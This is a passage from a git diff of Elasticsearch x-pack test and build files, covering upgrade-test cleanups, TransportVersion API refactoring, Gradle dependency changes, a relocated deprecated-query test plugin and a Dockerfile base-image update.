.configFile("testnode.crt", Resource.fromClasspath("/org/elasticsearch/xpack/security/transport/ssl/certs/simple/testnode.crt")) .configFile("service_tokens", Resource.fromClasspath("service_tokens")) .user(USER, PASS) .feature(FeatureFlag.TIME_SERIES_MODE) + .feature(FeatureFlag.SUB_OBJECTS_AUTO_ENABLED) + .systemProperty("es.queryable_built_in_roles_enabled", () -> { + final String enabled = System.getProperty("es.queryable_built_in_roles_enabled"); + return Objects.requireNonNullElse(enabled, ""); + }) .build(); public XpackWithMultipleProjectsClientYamlTestSuiteIT(@Name("yaml") ClientYamlTestCandidate testCandidate) { diff --git a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/ApiKeyBackwardsCompatibilityIT.java b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/ApiKeyBackwardsCompatibilityIT.java index 4d4b04456ec2a..3ed2a68d0129e 100644 --- a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/ApiKeyBackwardsCompatibilityIT.java +++ b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/ApiKeyBackwardsCompatibilityIT.java @@ -11,7 +11,6 @@ import org.apache.http.client.methods.HttpGet; import org.elasticsearch.Build; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.client.Request; import org.elasticsearch.client.RequestOptions; @@ -329,10 +328,10 @@ boolean nodeSupportApiKeyRemoteIndices(Map nodeDetails) { TransportVersion transportVersion = getTransportVersionWithFallback( nodeVersionString, nodeDetails.get("transport_version"), - () -> TransportVersions.ZERO + () -> TransportVersion.zero() ); - if (transportVersion.equals(TransportVersions.ZERO)) { + if (transportVersion.equals(TransportVersion.zero())) { // In cases where we were not able to find a TransportVersion, a pre-8.8.0 node answered about a newer (upgraded) node. // In that case, the node will be current (upgraded), and remote indices are supported for sure. var nodeIsCurrent = nodeVersionString.equals(Build.current().version()); diff --git a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/DataStreamsUpgradeIT.java b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/DataStreamsUpgradeIT.java index 1eff5c49dadc0..9242f5a9b5156 100644 --- a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/DataStreamsUpgradeIT.java +++ b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/DataStreamsUpgradeIT.java @@ -216,6 +216,9 @@ public void testUpgradeDataStream() throws Exception { if (ilmEnabled) { checkILMPhase(dataStreamName, upgradedIndicesMetadata); + // Delete the data streams to avoid ILM continuously running cluster state tasks, see + // https://github.com/elastic/elasticsearch/issues/129097#issuecomment-3016122739 + deleteDataStream(dataStreamName); } else { compareIndexMetadata(oldIndicesMetadata, upgradedIndicesMetadata); } @@ -227,7 +230,7 @@ public void testMigrateDoesNotRestartOnUpgrade() throws Exception { * This test makes sure that if reindex is run and completed, then when the cluster is upgraded the task * does not begin running again. */ - String dataStreamName = "reindex_test_data_stream_ugprade_test"; + String dataStreamName = "reindex_test_data_stream_upgrade_test"; int numRollovers = randomIntBetween(0, 5); boolean hasILMPolicy = randomBoolean(); boolean ilmEnabled = hasILMPolicy && randomBoolean(); @@ -237,6 +240,9 @@ public void testMigrateDoesNotRestartOnUpgrade() throws Exception { } else if (CLUSTER_TYPE == ClusterType.UPGRADED) { makeSureNoUpgrade(dataStreamName); cancelReindexTask(dataStreamName); + // Delete the data streams to avoid ILM continuously running cluster state tasks, see + // https://github.com/elastic/elasticsearch/issues/129097#issuecomment-3016122739 + deleteDataStream(dataStreamName); } else { makeSureNoUpgrade(dataStreamName); } @@ -650,7 +656,7 @@ private void upgradeDataStream( int expectedErrorCount, boolean ilmEnabled ) throws Exception { - Set indicesNeedingUpgrade = getDataStreamIndices(dataStreamName); + List indicesNeedingUpgrade = getDataStreamBackingIndexNames(dataStreamName); final int explicitRolloverOnNewClusterCount = randomIntBetween(0, 2); for (int i = 0; i < explicitRolloverOnNewClusterCount; i++) { String oldIndexName = rollover(dataStreamName); @@ -726,7 +732,7 @@ private void upgradeDataStream( } assertThat( statusResponseString, - getDataStreamIndices(dataStreamName).size(), + getDataStreamBackingIndexNames(dataStreamName).size(), equalTo(expectedTotalIndicesInDataStream) ); assertThat(statusResponseString, ((List) statusResponseMap.get("errors")).size(), equalTo(expectedErrorCount)); @@ -768,16 +774,6 @@ private void makeSureNoUpgrade(String dataStreamName) throws Exception { } } - @SuppressWarnings("unchecked") - private Set getDataStreamIndices(String dataStreamName) throws IOException { - Response response = client().performRequest(new Request("GET", "_data_stream/" + dataStreamName)); - Map responseMap = XContentHelper.convertToMap(JsonXContent.jsonXContent, response.getEntity().getContent(), false); - List> dataStreams = (List>) responseMap.get("data_streams"); - Map dataStream = dataStreams.get(0); - List> indices = (List>) dataStream.get("indices"); - return indices.stream().map(index -> index.get("index_name").toString()).collect(Collectors.toSet()); - } - /* * Similar to isOriginalClusterCurrent, but returns true if the major versions of the clusters are the same. So true * for 8.6 and 8.17, but false for 7.17 and 8.18. @@ -859,6 +855,10 @@ private void createRole(String name, String dataStream) throws IOException { assertOK(adminClient().performRequest(request)); } + private void deleteDataStream(String name) throws IOException { + client().performRequest(new Request("DELETE", "_data_stream/" + name)); + } + private RestClient getClient(String user, String passwd) throws IOException { RestClientBuilder builder = RestClient.builder(adminClient().getNodes().toArray(new Node[0])); String token = basicAuthHeaderValue(user, new SecureString(passwd.toCharArray())); diff --git a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/RolesBackwardsCompatibilityIT.java b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/RolesBackwardsCompatibilityIT.java index 54b7ff6fa484c..c2d27b8cb5168 100644 --- a/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/RolesBackwardsCompatibilityIT.java +++ b/x-pack/qa/rolling-upgrade/src/test/java/org/elasticsearch/upgrades/RolesBackwardsCompatibilityIT.java @@ -317,10 +317,10 @@ private boolean nodeSupportTransportVersion(Map nodeDetails, Tra TransportVersion nodeTransportVersion = getTransportVersionWithFallback( nodeVersionString, nodeDetails.get("transport_version"), - () -> TransportVersions.ZERO + () -> TransportVersion.zero() ); - if (nodeTransportVersion.equals(TransportVersions.ZERO)) { + if (nodeTransportVersion.equals(TransportVersion.zero())) { // In cases where we were not able to find a TransportVersion, a pre-8.8.0 node answered about a newer (upgraded) node. // In that case, the node will be current (upgraded), and remote indices are supported for sure. var nodeIsCurrent = nodeVersionString.equals(Build.current().version()); diff --git a/x-pack/qa/smoke-test-plugins-ssl/build.gradle b/x-pack/qa/smoke-test-plugins-ssl/build.gradle index cbd837fc2ccf6..03e67bdf0dd4b 100644 --- a/x-pack/qa/smoke-test-plugins-ssl/build.gradle +++ b/x-pack/qa/smoke-test-plugins-ssl/build.gradle @@ -83,6 +83,8 @@ testClusters.matching { it.name == "yamlRestTest" }.configureEach { user username: "test_user", password: "x-pack-test-password" user username: "monitoring_agent", password: "x-pack-test-password", role: "remote_monitoring_agent" + systemProperty 'es.queryable_built_in_roles_enabled', 'false' + pluginPaths.each { pluginPath -> plugin pluginPath } diff --git a/x-pack/rest-resources-zip/build.gradle b/x-pack/rest-resources-zip/build.gradle index 6cc39aa168e91..ab684c8b0c367 100644 --- a/x-pack/rest-resources-zip/build.gradle +++ b/x-pack/rest-resources-zip/build.gradle @@ -20,6 +20,7 @@ dependencies { freeTests project(path: ':rest-api-spec', configuration: 'restTests') freeTests project(path: ':modules:aggregations', configuration: 'restTests') freeTests project(path: ':modules:analysis-common', configuration: 'restTests') + freeTests project(path: ':modules:data-streams', configuration: 'restTests') freeTests project(path: ':modules:ingest-geoip', configuration: 'restTests') compatApis project(path: ':rest-api-spec', configuration: 'restCompatSpecs') compatApis project(path: ':x-pack:plugin', configuration: 'restCompatSpecs') @@ -28,6 +29,7 @@ dependencies { platinumTests project(path: ':x-pack:plugin:eql:qa:rest', configuration: 'restXpackTests') platinumTests project(path: ':x-pack:plugin:ent-search', configuration: 'restXpackTests') platinumTests project(path: ':x-pack:plugin:inference', configuration: 'restXpackTests') + platinumTests project(path: ':x-pack:plugin:watcher:qa:rest', configuration: 'restXpackTests') platinumCompatTests project(path: ':x-pack:plugin', configuration: 'restCompatTests') platinumCompatTests project(path: ':x-pack:plugin:eql:qa:rest', configuration: 'restCompatTests') } @@ -57,6 +59,6 @@ def restResourcesZip = tasks.register('restResourcesZip', Zip) { } } -artifacts { - archives restResourcesZip +tasks.named('assemble').configure { + dependsOn restResourcesZip } diff --git a/x-pack/plugin/enrich/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichIT.java b/x-pack/test/deprecated-query/build.gradle similarity index 54% rename from x-pack/plugin/enrich/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichIT.java rename to x-pack/test/deprecated-query/build.gradle index 981fe393edc5b..b0c14cd6b5d42 100644 --- a/x-pack/plugin/enrich/qa/rest/src/javaRestTest/java/org/elasticsearch/xpack/enrich/EnrichIT.java +++ b/x-pack/test/deprecated-query/build.gradle @@ -4,8 +4,11 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -package org.elasticsearch.xpack.enrich; -import org.elasticsearch.test.enrich.CommonEnrichRestTestCase; +apply plugin: 'elasticsearch.base-internal-es-plugin' -public class EnrichIT extends CommonEnrichRestTestCase {} +esplugin { + name = 'x-pack-test-deprecated-query' + description = 'Deprecated query plugin' + classname ='org.elasticsearch.query.DeprecatedQueryPlugin' +} diff --git a/x-pack/plugin/async-search/qa/rest/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java b/x-pack/test/deprecated-query/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java similarity index 96% rename from x-pack/plugin/async-search/qa/rest/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java rename to x-pack/test/deprecated-query/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java index 4250a64f8d407..480dce72d6bca 100644 --- a/x-pack/plugin/async-search/qa/rest/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java +++ b/x-pack/test/deprecated-query/src/main/java/org/elasticsearch/query/DeprecatedQueryBuilder.java @@ -10,7 +10,6 @@ import org.apache.lucene.search.MatchAllDocsQuery; import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -78,6 +77,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/async-search/qa/rest/src/main/java/org/elasticsearch/query/DeprecatedQueryPlugin.java b/x-pack/test/deprecated-query/src/main/java/org/elasticsearch/query/DeprecatedQueryPlugin.java similarity index 100% rename from x-pack/plugin/async-search/qa/rest/src/main/java/org/elasticsearch/query/DeprecatedQueryPlugin.java rename to x-pack/test/deprecated-query/src/main/java/org/elasticsearch/query/DeprecatedQueryPlugin.java diff --git a/x-pack/test/idp-fixture/src/main/resources/oidc/Dockerfile b/x-pack/test/idp-fixture/src/main/resources/oidc/Dockerfile index 858038d483349..92cd2f46436db 100644 --- a/x-pack/test/idp-fixture/src/main/resources/oidc/Dockerfile +++ b/x-pack/test/idp-fixture/src/main/resources/oidc/Dockerfile @@ -1,5 +1,5 @@ FROM c2id/c2id-server-demo:16.1.1 AS c2id -FROM openjdk:21-jdk-buster +FROM eclipse-temurin:17-noble # Using this to launch a fake server on container start; see `setup.sh` RUN apt-get update -qqy && apt-get install -qqy python3